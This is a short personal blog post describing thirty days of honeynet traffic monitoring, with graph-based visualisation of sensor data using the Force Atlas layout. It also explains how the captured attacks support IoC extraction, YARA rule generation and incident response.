4n6strider

Your Data Zen starts here.

Honeynet: A 30 days of network traffic security monitoring

A picture above shows the network traffic as observed by the Honeynet.
Botnets attempting to do the SSH brute forcing of exposed services, DDOSe’s, security researchers activity, vulnerability scanners, hacktivist campaigns, you name it. It is all there.
But lets start from the beginning.

This study shows only 30 days of the monitoring to ease up the visualization part of the data processing.

Granted that skilled hacker does not usually fall for the honeypot (intentionally vulnerable system exposed for attacks), the network of honeypots called the Honeynet serves mostly to support other security monitoring, spot the script kiddies, new botnet campaigns or currently happening automated attacks “in the wild”.

Alternatively, the future hacks can be caught by the Honeynet in the stage when they are still PoC’s, the proofs of the concept rather than real hacks.

By analyzing the data from the Honeynet, indicators of compromise, the “IoC’s” can be extracted too.
Also by samples’ strings analysis, YARA rules can be generated to monitor malware samples propagation and to be able to spot eventual infection of the system early.

All of this also supports the Incident Response process itself. Especially handy is the data during the initial drawing for the timeline of the security incident itself.

Second picture shows the same modulation of the data, only with the labels. In the center there are readable labels of the most productive sensors.
[sensor ID is a random string generated during creation of the sensor by the system]

Using the Graph theory for the Honeynet Security Data Analysis, it is beneficial to first transform the graph visual using for example the Force – Atlas algorithm.

Me personally, I am very fond of this particular Force Atlas algorithm due to the fact, it is based on the laws of physics, so the outputs come very natural and readable.

This is the picture, finally processed to reveal the structure of the traffic within the Honeynet itself.
Its meaning is both for security data analysis, individual sensors performance evaluation and last but not least, the Honeynet Maintenance purposes:

Next Post

Previous Post

© 2018 4n6strider

Theme by Anders Norén